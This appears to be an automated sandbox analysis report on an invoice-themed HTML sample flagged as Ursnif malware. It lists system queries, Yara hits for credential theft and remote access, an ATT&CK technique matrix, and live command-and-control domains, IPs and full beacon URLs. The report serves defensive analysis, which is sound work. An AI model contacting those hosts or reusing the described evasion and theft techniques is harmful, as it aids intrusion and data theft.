                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0011~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00114~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0014~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00112~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
                Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: SetThreadPriority,NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_031B54EC cpuid
                Source: C:\Windows\SysWOW64\unarchiver.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_00CB6783 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_031B1F1D GetVersionExA,wsprintfA,
                Source: C:\Users\user\AppData\Local\Temp\xxl.exeCode function: 14_2_031B54EC RtlAllocateHeap,GetUserNameW,RtlAllocateHeap,GetUserNameW,HeapFree,GetComputerNameW,GetComputerNameW,RtlAllocateHeap,GetComputerNameW,HeapFree,

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 0000000E.00000003.424404208.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424565184.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424527278.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424606471.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.641720326.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.719654681.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424635510.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424671008.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424712096.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424336717.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: xxl.exe PID: 6504, type: MEMORYSTR
                Source: Yara matchFile source: 14.2.xxl.exe.4ef94a0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.2df4431.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.10000000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.31b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.2dfe040.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.2df4431.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.719611917.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.719379551.0000000002DE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 0000000E.00000003.424404208.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424565184.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424527278.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424606471.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.641720326.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.719654681.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424635510.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424671008.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424712096.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000003.424336717.00000000053F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: xxl.exe PID: 6504, type: MEMORYSTR
                Source: Yara matchFile source: 14.2.xxl.exe.4ef94a0.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.2df4431.1.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.10000000.5.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.31b0000.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.2dfe040.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 14.2.xxl.exe.2df4431.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.719611917.0000000004EF9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.719379551.0000000002DE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                Valid Accounts2
                Windows Management Instrumentation
                1
                DLL Side-Loading
                1
                DLL Side-Loading
                1
                Disable or Modify Tools
                OS Credential Dumping1
                System Time Discovery
                Remote Services11
                Archive Collected Data
                Exfiltration Over Other Network Medium2
                Ingress Tool Transfer
                Eavesdrop on Insecure Network CommunicationRemotely Track Device Without Authorization1
                Data Encrypted for Impact
                Default Accounts12
                Native API
                Boot or Logon Initialization Scripts11
                Process Injection
                1
                Obfuscated Files or Information
                LSASS Memory1
                Account Discovery
                Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth21
                Encrypted Channel
                Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                Domain Accounts2
                Command and Scripting Interpreter
                Logon Script (Windows)Logon Script (Windows)1
                Software Packing
                Security Account Manager1
                File and Directory Discovery
                SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration3
                Non-Application Layer Protocol
                Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)1
                DLL Side-Loading
                NTDS135
                System Information Discovery
                Distributed Component Object ModelInput CaptureScheduled Transfer4
                Application Layer Protocol
                SIM Card SwapCarrier Billing Fraud
                Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script3
                Masquerading
                LSA Secrets131
                Security Software Discovery
                SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
                Replication Through Removable MediaLaunchdRc.commonRc.common131
                Virtualization/Sandbox Evasion
                Cached Domain Credentials131
                Virtualization/Sandbox Evasion
                VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                External Remote ServicesScheduled TaskStartup ItemsStartup Items11
                Process Injection
                DCSync2
                Process Discovery
                Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                Application Window Discovery
                Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Masquerading/etc/passwd and /etc/shadow1
                System Owner/User Discovery
                Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Invalid Code SignatureNetwork Sniffing1
                Remote System Discovery
                Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 725636 Sample: Invoice_7892_18Oct.html Startdate: 18/10/2022 Architecture: WINDOWS Score: 100 54 Snort IDS alert for network traffic 2->54 56 Malicious sample detected (through community Yara rule) 2->56 58 Yara detected  Ursnif 2->58 60 2 other signatures 2->60 8 chrome.exe 18 8 2->8         started        11 chrome.exe 2->11         started        process3 dnsIp4 46 192.168.2.1 unknown unknown 8->46 48 239.255.255.250 unknown Reserved 8->48 13 unarchiver.exe 5 8->13         started        16 chrome.exe 8->16         started        process5 dnsIp6 70 Uses 7zip to decompress a password protected archive 13->70 19 cmd.exe 2 13->19         started        22 cmd.exe 1 13->22         started        24 7za.exe 2 13->24         started        40 www.google.com 142.250.203.100, 443, 49712, 49738 GOOGLEUS United States 16->40 42 accounts.google.com 142.250.203.109, 443, 49704, 49707 GOOGLEUS United States 16->42 44 3 other IPs or domains 16->44 signatures7 process8 file9 38 C:\Users\user\AppData\Local\Temp\xxl.exe, PE32 19->38 dropped 26 xxl.exe 6 19->26         started        30 conhost.exe 1 19->30         started        32 powershell.exe 36 22->32         started        34 conhost.exe 22->34         started        36 conhost.exe 24->36         started        process10 dnsIp11 50 onlinetwork.top 31.41.44.194, 49740, 49744, 80 ASRELINKRU Russian Federation 26->50 52 linetwork.top 62.173.145.183, 49741, 49746, 80 SPACENET-ASInternetServiceProviderRU Russian Federation 26->52 62 Found evasive API chain (may stop execution after checking system information) 26->62 64 Found stalling execution ending in API Sleep call 26->64 66 Found API chain indicative of debugger detection 26->66 68 2 other signatures 26->68 signatures12

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                No Antivirus matches
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Local\Temp\xxl.exe0%ReversingLabs
                C:\Users\user\AppData\Local\Temp\xxl.exe0%MetadefenderBrowse
                SourceDetectionScannerLabelLinkDownload
                14.2.xxl.exe.31b0000.3.unpack100%AviraHEUR/AGEN.1245293Download File
                14.2.xxl.exe.10000000.5.unpack100%AviraTR/Crypt.XPACK.Gen8Download File
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://onlinetwork.top/drew/UogjlH55j3MBdVW7Zgv8/7VAIAiwJ_2FicnQxfIo/vdYsidWojPlxWiOLycfrCH/0jMFVE77apOpr/yiV9EWj6/4LmIXy_2FzHYZsf_2BzbbER/6LftEOfnlg/Uzke2V7qIbQmNXXHb/tnLubrQ7fIkI/GL44ItzX_2B/5weW8TeiFRMx3R/0FalNtY_2FOlb5Arb_2Fa/ayhw4EzvdF98V_2F/QvfDYcXOi_2FxiR/FUnDGyMWNFOFvK99Tq/AboGOqHpH/FFIxlK22ZxSjYALa3Nyd/r2bY6gbX_2BKLnqSzWK/N5bQl56P/1.jlk0%Avira URL Cloudsafe
                http://linetwork.top/drew/TVgVtfJMME1TQDqbWdYo/ezMinaihuLtBtHa0yLo/29N_2BdcUX8GiKCW_2FFcH/G2EEXMAEzocHs/1j0yJOR1/eGMTPdpRhncWUghvDrmpfdi/eKYCLFtVRB/CVYtk9exYzeSrEd9o/r1M5RtNeelrL/BOq3WhytwH0/LSHm7cB7uN0f_2/BOF5OriNbSGHY_2Bu3zcM/HQrJ_2FDizJQq2kU/CdUDwQJw3ybpG6w/prA2XAjnZImMTnv_2B/y35swvqbW/8ll_2FkkiqSxdgXsTIPh/ZgYm_2BBwbPVDYoRfa8/RjAv97g.jlk0%Avira URL Cloudsafe
                http://onlinetwork.top/drew/9HjvFMPL_/2BodLadHv2Ij_2BnGRof/O5HwRn2RgD6rqZ1SvG5/VMrxgkKm7ed8PnDV4333Df/zIgAPypmoxSLi/8BFA8aIq/BD3jcPWLpFftdB57Hvs_2Bt/pdv8XCmdY6/t4jYCo1nX0gAaeZmr/b90Tdg7fzlxH/cqhZiWRACEm/b39xMwhhk6CBY5/vAnGlr5gQfe7832Po6dgp/kFDd8JW_2BQt2yuf/g3y_2BsnEgcapzm/FqXLCXTc0ul_2Fu7dh/W1oq_2BeZ/dlpTOTrr2A44rzvoNR9t/Ed7vICgSqP/MZk6s.jlk0%Avira URL Cloudsafe
                http://linetwork.top/drew/0J0YP9e_2BE7jjAw7XL/AjrHr6NCwO_2Fgj3xqU8HO/e5KwJWvAPxhz7/Er8_2FGw/w6mbMJPoDfQgM_2F5q_2BTA/2EWmrv1LcM/HkHdywibkWgZEZttV/CVVHNFdmhCzK/32gECX5_2BF/KHHudCe_2FBTtm/7PKDpa0dUHWbR_2B1kpX9/AWYTWzr3Mrqxmvg2/b3_2B3bUAXRAtbT/lS0IcV4DbS6jYYG_2F/Ohgp0G9Gj/CtOwH_2BiEVt378VRySb/pgZSH7eC_2Bee3HXiCJ/BjrtGyiuFj_2Fduvn85Qkm/9VcCSZNN/bQ6ATZ6.jlk0%Avira URL Cloudsafe
                NameIPActiveMaliciousAntivirus DetectionReputation
                accounts.google.com
                142.250.203.109
                truefalse
                  high
                  www.google.com
                  142.250.203.100
                  truefalse
                    high
                    clients.l.google.com
                    142.250.203.110
                    truefalse
                      high
                      linetwork.top
                      62.173.145.183
                      truefalse
                        unknown
                        onlinetwork.top
                        31.41.44.194
                        truetrue
                          unknown
                          clients2.google.com
                          unknown
                          unknownfalse
                            high
                            NameMaliciousAntivirus DetectionReputation
                            https://clients2.google.com/service/update2/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=chromecrx&prodchannel=&prodversion=104.0.5112.81&lang=en-US&acceptformat=crx3&x=id%3Dnmmhkkegccagdldgiimedpiccmgmieda%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1false
                              high
                              http://onlinetwork.top/drew/9HjvFMPL_/2BodLadHv2Ij_2BnGRof/O5HwRn2RgD6rqZ1SvG5/VMrxgkKm7ed8PnDV4333Df/zIgAPypmoxSLi/8BFA8aIq/BD3jcPWLpFftdB57Hvs_2Bt/pdv8XCmdY6/t4jYCo1nX0gAaeZmr/b90Tdg7fzlxH/cqhZiWRACEm/b39xMwhhk6CBY5/vAnGlr5gQfe7832Po6dgp/kFDd8JW_2BQt2yuf/g3y_2BsnEgcapzm/FqXLCXTc0ul_2Fu7dh/W1oq_2BeZ/dlpTOTrr2A44rzvoNR9t/Ed7vICgSqP/MZk6s.jlktrue
                              • Avira URL Cloud: safe
                              unknown
                              http://linetwork.top/drew/0J0YP9e_2BE7jjAw7XL/AjrHr6NCwO_2Fgj3xqU8HO/e5KwJWvAPxhz7/Er8_2FGw/w6mbMJPoDfQgM_2F5q_2BTA/2EWmrv1LcM/HkHdywibkWgZEZttV/CVVHNFdmhCzK/32gECX5_2BF/KHHudCe_2FBTtm/7PKDpa0dUHWbR_2B1kpX9/AWYTWzr3Mrqxmvg2/b3_2B3bUAXRAtbT/lS0IcV4DbS6jYYG_2F/Ohgp0G9Gj/CtOwH_2BiEVt378VRySb/pgZSH7eC_2Bee3HXiCJ/BjrtGyiuFj_2Fduvn85Qkm/9VcCSZNN/bQ6ATZ6.jlkfalse
                              • Avira URL Cloud: safe
                              unknown
                              file:///C:/Users/user/Desktop/Invoice_7892_18Oct.htmltrue
                                low
                                http://onlinetwork.top/drew/UogjlH55j3MBdVW7Zgv8/7VAIAiwJ_2FicnQxfIo/vdYsidWojPlxWiOLycfrCH/0jMFVE77apOpr/yiV9EWj6/4LmIXy_2FzHYZsf_2BzbbER/6LftEOfnlg/Uzke2V7qIbQmNXXHb/tnLubrQ7fIkI/GL44ItzX_2B/5weW8TeiFRMx3R/0FalNtY_2FOlb5Arb_2Fa/ayhw4EzvdF98V_2F/QvfDYcXOi_2FxiR/FUnDGyMWNFOFvK99Tq/AboGOqHpH/FFIxlK22ZxSjYALa3Nyd/r2bY6gbX_2BKLnqSzWK/N5bQl56P/1.jlktrue
                                • Avira URL Cloud: safe
                                unknown
                                http://linetwork.top/drew/TVgVtfJMME1TQDqbWdYo/ezMinaihuLtBtHa0yLo/29N_2BdcUX8GiKCW_2FFcH/G2EEXMAEzocHs/1j0yJOR1/eGMTPdpRhncWUghvDrmpfdi/eKYCLFtVRB/CVYtk9exYzeSrEd9o/r1M5RtNeelrL/BOq3WhytwH0/LSHm7cB7uN0f_2/BOF5OriNbSGHY_2Bu3zcM/HQrJ_2FDizJQq2kU/CdUDwQJw3ybpG6w/prA2XAjnZImMTnv_2B/y35swvqbW/8ll_2FkkiqSxdgXsTIPh/ZgYm_2BBwbPVDYoRfa8/RjAv97g.jlkfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  62.173.145.183
                                  linetwork.topRussian Federation
                                  34300SPACENET-ASInternetServiceProviderRUfalse
                                  142.250.203.100
                                  www.google.comUnited States
                                  15169GOOGLEUSfalse
                                  142.250.203.110
                                  clients.l.google.comUnited States
                                  15169GOOGLEUSfalse
                                  239.255.255.250
                                  unknownReserved
                                  unknownunknownfalse
                                  31.41.44.194
                                  onlinetwork.topRussian Federation
                                  56577ASRELINKRUtrue
                                  142.250.203.109
                                  accounts.google.comUnited States
                                  15169GOOGLEUSfalse
                                  IP
                                  192.168.2.1
                                  127.0.0.1
                                  Joe Sandbox Version:36.0.0 Rainbow Opal
                                  Analysis ID:725636
                                  Start date and time:2022-10-18 21:42:11 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 8m 47s
                                  Hypervisor based Inspection enabled:false
                                  Report type:light
                                  Sample file name:Invoice_7892_18Oct.html
                                  Cookbook file name:defaultwindowshtmlcookbook.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:16
                                  Number of new started drivers analysed:3
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
